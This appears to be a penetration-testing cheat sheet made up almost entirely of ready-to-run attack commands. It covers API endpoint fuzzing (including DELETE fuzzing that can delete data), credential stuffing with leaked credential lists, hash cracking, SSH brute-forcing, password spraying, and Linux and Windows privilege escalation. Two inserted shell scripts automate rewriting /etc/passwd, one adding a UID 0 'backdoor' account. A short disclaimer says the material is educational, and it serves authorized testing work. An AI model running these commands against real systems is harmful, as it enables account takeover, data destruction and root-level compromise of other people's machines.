# Path Fuzzing (Basic)
ffuf -u https://api.target.com/FUZZ -w api-endpoints.txt -mc 200,201,401,403,405 -t 50 -rate 100

# Path Fuzzing (Extended)
# Notice 400 might cause many false positives.
ffuf -u https://api.target.com/FUZZ -w api-endpoints.txt -mc 200,201,401,403,405,400,302 -t 50 -rate 100

# Exclude 404 status code and save results to a file
ffuf -u https://api.target.com/FUZZ -w wordlist.txt -fc 404 -o results.json -of json

# API Version Enumeration
# api-versions.txt (one entry per line) might look like:
# 0, v0, v1, v2, v3, ...
# dev, legacy, old, deprecated, api, api1 ...
ffuf -u https://api.target.com/FUZZ/users -w api-versions.txt -fc 404

# Enumerate through api version and path
ffuf -u https://api.target.com/FUZZ1/FUZZ2 -w api-versions.txt:FUZZ1 -w api-endpoints.txt:FUZZ2 -fc 404

# HTTP Method Fuzzing
# Use OPTIONS/HEAD to discover supported methods before heavy fuzzing. Be careful with DELETE!
# Example http-method.txt: GET, POST , PUT, PATCH, DELETE, HEAD, OPTIONS, TRACE, CONNECT
ffuf -u https://api.target.com/api/users1 -X FUZZ -w http-methods.txt -fc 404,405

# Endpoint Fuzzing with DELETE method (use with caution!)
ffuf -u https://api.target.com/FUZZ -w api-endpoints.txt -X DELETE -mc 200,202,204,401,403,404,405

# 200 OK - resource deleted (often returns info).
# 202 Accepted - deletion queued/asynchronous.
# 204 No Content - deleted, no body returned.
# 401/403 - authentication/authorization required or forbidden.
# 404 - resource not found.
# 405 - DELETE not allowed on that endpoint.

# Credential Stuffing Attack
ffuf -w emails.txt:FUZZ1 -w passwords.txt:FUZZ2 -X  POST -d '{"email":"FUZZ1","password":"FUZZ2"}' -H "Content-Type:  application/json" -u http://<TARGET>/example/api/endpoint/user/login -mc 200  -mode pitchfork -s

💡 Tips and Tricks

If you have credential files, e.g. creds.csv with usernames and passwords, you can split the file into two separate wordlists (emails and passwords):

# Extracting the emails
cut -d "," -f 1 creds.csv > emails.txt
 
# Extracting the passwords
cut -d "," -f 2 creds.csv > passwords.txt

Password Attacks

Hash Cracking

hashcat

# Crack NTLM hashes (-m 1000) with a wordlist and the best64 rule set
hashcat -m 1000 hashes.txt /usr/share/wordlists/rockyou.txt --rules-file /usr/share/hashcat/rules/best64.rule

John (John the Ripper)

# Basic hashes cracking 
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt

Online Brute-force

hydra

# SSH brute-force (-t 4 keeps parallel connections low to avoid lockouts and sshd connection limits)
hydra -l admin -P /usr/share/wordlists/rockyou.txt TARGET_IP ssh -t 4

Password Spraying

crackmapexec

# SMB password spray across a user list with one password (--continue-on-success keeps going after the first hit); the same syntax works with nxc
crackmapexec smb TARGET_IP -u users.txt -p 'Season2026!' --continue-on-success

Privilege Escalation - Linux

SUID, SGID, StickyBit

Locate applications you can run as root (SUID binaries owned by root), plus SGID files and sticky directories.

# Find files that have both SUID and SGID set (-perm -MODE: all listed bits must be set)
$ find . -perm -6000

# Find files with SUID, SGID or StickyBit set (-perm /MODE: any listed bit; the old +MODE syntax is rejected by current GNU find)
$ sudo find / -perm /7000 -type f

# Find directories with SUID, SGID or StickyBit
$ sudo find / -perm /7000 -type d

# Find SUID files (the usual privesc candidates), ignoring permission errors
find / -perm -u=s -type f 2>/dev/null
# Find sticky-bit directories (e.g. /tmp)
find / -perm -1000 -type d 2>/dev/null

# Privilege  escalation with SUID 
https://www.hackingarticles.in/linux-for-pentester-cp-privilege-escalation/
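To see exactly which find expression catches which file, the following added example (not part of the original page) builds a throwaway directory with every special-bit combination and runs the finders from this section over it. It assumes GNU find (for -perm /MODE and -mindepth) and a filesystem that keeps the bits; the fixture layout and function names are constructed for the example.

```shell
#!/bin/sh
# Added example (not from the original page): demonstrate -perm -MODE (ALL
# listed bits required) versus -perm /MODE (ANY listed bit) on a fixture.
# Assumes GNU find; the old +MODE form errors out there.

# make_perm_fixture DIR: create sample files/dirs with known modes inside DIR
make_perm_fixture() {
  dir="$1"
  for f in suid sgid both plain; do : > "$dir/$f"; done
  mkdir "$dir/sticky"
  chmod 4755 "$dir/suid"     # set-user-ID only
  chmod 2755 "$dir/sgid"     # set-group-ID only
  chmod 6755 "$dir/both"     # SUID and SGID
  chmod 0755 "$dir/plain"    # no special bits
  chmod 1777 "$dir/sticky"   # sticky directory, like /tmp
}

# Each finder prints matching names relative to DIR, sorted for stable output.
_names() { sed 's#^\./##' | sort; }
find_suid()          { ( cd "$1" && find . -type f -perm -4000 | _names ); }     # same as -perm -u=s
find_suid_and_sgid() { ( cd "$1" && find . -type f -perm -6000 | _names ); }     # both bits required
find_any_special()   { ( cd "$1" && find . -mindepth 1 -perm /7000 | _names ); } # any of SUID/SGID/sticky
find_sticky_dirs()   { ( cd "$1" && find . -type d -perm -1000 | _names ); }

# Demo
demo_dir="$(mktemp -d)"
make_perm_fixture "$demo_dir"
echo "SUID files:       $(find_suid "$demo_dir" | tr '\n' ' ')"
echo "SUID+SGID files:  $(find_suid_and_sgid "$demo_dir" | tr '\n' ' ')"
echo "any special bit:  $(find_any_special "$demo_dir" | tr '\n' ' ')"
echo "sticky dirs:      $(find_sticky_dirs "$demo_dir" | tr '\n' ' ')"
rm -rf "$demo_dir"
```

The point the fixture makes: `-perm -6000` only returns the file with both bits, which is why a privesc sweep for SUID binaries uses `-perm -4000` (or `-u=s`) and a sweep for anything unusual uses `-perm /7000`.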

Capabilities

# List files with Linux capabilities
getcap -r / 2>/dev/null

Cron Jobs

# All scheduled cron jobs
cat /etc/crontab && ls -la /etc/cron.* && crontab -l

Sudo Misconfigurations

# List commands the current user can run as sudo
sudo -l

Passwd Overwrite (with Generated Hashes)

/etc/passwd, /etc/shadow - obtain a copy of these files to crack root or privileged user passwords. If /etc/passwd is writable (or a SUID cp/tee lets you overwrite it), a password hash placed in the second field of /etc/passwd takes precedence over /etc/shadow.

# 1. Generate a salted hash
# Salted MD5 (MD5-crypt uses at most 8 salt characters, SHA-crypt up to 16)
openssl passwd -1 -salt examplesaltvalue123 <YOUR_PASSWORD>
# output format: $1$<salt>$<hash>

# or
SALT=$(openssl rand -base64 6) # 6 random bytes -> 8 base64 characters
# Salted MD5
openssl passwd -1 -salt "$SALT" <YOUR_PASSWORD>
# Salted SHA-256
openssl passwd -5 -salt "$SALT" <YOUR_PASSWORD>
# Salted SHA-512 (preferred; matches what modern /etc/shadow uses)
openssl passwd -6 -salt "$SALT" <YOUR_PASSWORD>

# 2. Paste the hash into a writable passwd file
# Example:
# copy /etc/passwd to your home directory,
# edit it to add a new UID 0 user (or change an existing one) and put the hash in the second field, where the "x" normally defers to /etc/shadow,
# finally copy it back over /etc/passwd (possible when the file is writable or cp runs as root, e.g. SUID cp).
  /etc/passwd (original):
  root:x:0:0:root:/root:/bin/bash
  /etc/passwd (changed; keep the colon after the username, the hash replaces only the "x"):
  root:<YOUR_PWD_HASH>:0:0:root:/root:/bin/bash

# https://notes.benheater.com/books/linux/page/alternate-information-gathering-methods
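The edit step above is easy to get wrong by hand (a dropped colon turns the username into "root$6$..." and the account simply stops working). The following added example, not part of the original page, does the rewrite with awk and checks the result before it is copied back. The passwd contents and the hash value are constructed placeholders, and the function names are the example's own; a real hash comes from `openssl passwd -6` as shown above.

```shell
#!/bin/sh
# Added example (not from the original page): rewrite the password field of
# one /etc/passwd entry, or append a UID 0 entry, and sanity-check the file.

# set_passwd_hash FILE USER HASH: print FILE with USER's second field replaced
# by HASH (the "x" there normally defers to /etc/shadow; a hash overrides it).
set_passwd_hash() {
  awk -F: -v OFS=: -v user="$2" -v hash="$3" '
    $1 == user { $2 = hash }
    { print }' "$1"
}

# add_root_user FILE NAME HASH: print FILE plus a new UID 0 / GID 0 account.
add_root_user() {
  cat "$1"
  printf '%s:%s:0:0:root:/root:/bin/bash\n' "$2" "$3"
}

# passwd_is_wellformed: read a passwd file on stdin; succeed only if every
# line has exactly seven colon-separated fields with a numeric UID and GID.
passwd_is_wellformed() {
  awk -F: '
    BEGIN { bad = 0 }
    NF != 7 || $3 !~ /^[0-9]+$/ || $4 !~ /^[0-9]+$/ { bad = 1; exit }
    END { exit bad }'
}

# uid0_accounts: list the usernames that log in as root (UID 0)
uid0_accounts() {
  awk -F: '$3 == 0 { print $1 }'
}

# Demo on a constructed passwd file and a placeholder hash
demo="$(mktemp)"
printf '%s\n' \
  'root:x:0:0:root:/root:/bin/bash' \
  'daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin' \
  'bob:x:1000:1000:Bob:/home/bob:/bin/bash' > "$demo"
hash='$6$examplesalt$PLACEHOLDERHASH'   # not a real SHA-512 crypt value

set_passwd_hash "$demo" root "$hash" | passwd_is_wellformed && echo "modified root entry is well-formed"
add_root_user "$demo" backdoor "$hash" | uid0_accounts    # lists root and backdoor
rm -f "$demo"
```

Run the well-formedness check on the edited copy before overwriting /etc/passwd; on a real target, the `uid0_accounts` listing is also what a defender's audit looks for, so remove the entry once done.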

Privilege Escalation - Windows

Escalate from low-priv user to SYSTEM. Token impersonation, service abuse, unquoted paths.

WinPEAS

## WinPEAS - automated Windows privesc enumeration
winPEASany.exe quiet fast searchfast

whoami

# Check current privileges - look for SeImpersonate, SeBackup
whoami /priv

Token Impersonation

# Exploit SeImpersonatePrivilege (typically held by service accounts such as IIS and MSSQL). GodPotato covers Windows 8 / Server 2012 through Windows 11 / Server 2022, including hosts where JuicyPotato no longer works; pick the build matching the installed .NET version.
.\GodPotato.exe -cmd "cmd /c whoami"

Unquoted Service Paths

# Find auto-start services whose binary lives outside C:\Windows and whose path is unquoted; it is exploitable only if the path contains spaces and you can write to one of the intermediate directories
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """
# wmic is deprecated on current Windows; the PowerShell equivalent:
Get-CimInstance Win32_Service | Where-Object { $_.PathName -notmatch '^"' -and $_.PathName -match ' ' -and $_.PathName -notmatch 'C:\\Windows' } | Select-Object Name, PathName, StartMode

Useful Resources

https://pentestmindmap.com/cheatsheet


⚠️ Disclaimer: The content on this site is for educational purposes only and should be used responsibly in authorized environments. Unauthorized actions may be illegal. Read the full disclaimer.